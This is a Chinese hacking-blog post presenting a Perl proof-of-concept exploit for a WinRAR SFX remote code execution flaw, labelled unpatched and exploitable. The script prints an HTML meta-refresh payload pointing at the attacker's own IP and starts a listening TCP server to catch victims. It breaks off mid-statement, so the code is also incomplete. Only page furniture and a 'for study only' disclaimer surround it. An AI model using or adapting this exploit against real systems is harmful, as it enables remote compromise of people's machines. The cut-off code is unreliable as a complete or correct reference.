WinRAR 压缩工具可执行远程代码漏洞poc

  • 内容
  • 相关

未修复可利用


PoC: Exploit Code
#!/usr/bin/perl
# Title : WinRaR SFX – Remote Code Execution
# Tested on Windows 7 / Server 2008 / Server 2003
#
# l0s4r.com

use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket ‘inet_ntoa’;
use Sys::Hostname ‘hostname’;

print ” Mohammad Reza Espargham\n\n”;
my $ip = inet_ntoa(scalar gethostbyname(hostname() || ‘localhost’));

my $port = 80;

print “Winrar HTML Code\n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip .
‘”></head></html>’.”\n\n” if($port==80);
print “Winrar HTML Code\n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip .
‘:’ . $port . ‘”></head></html>’.”\n\n” if($port!=80);

my $server = new IO::Socket::INET( Proto => ‘tcp’,
LocalPort => $port,
Listen => SOMAXCONN,
ReuseAddr => 1)
or die “Unable to create server socket”;

# Server loop
while(my $client = $server->accept())
{
my $client_info;
while(<$client>)
{
last if /^\r\n$/;
$client_info .= $_;
}
incoming($client, $client_info);
}

sub incoming
{
print “\n=== Incoming Request:\n”;
my $client = shift;
print $c


本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360未收录] | [搜狗已收录]

本文链接:WinRAR 压缩工具可执行远程代码漏洞poc - https://www.0dayhack.com/post-681.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

00:00 / 00:00
顺序播放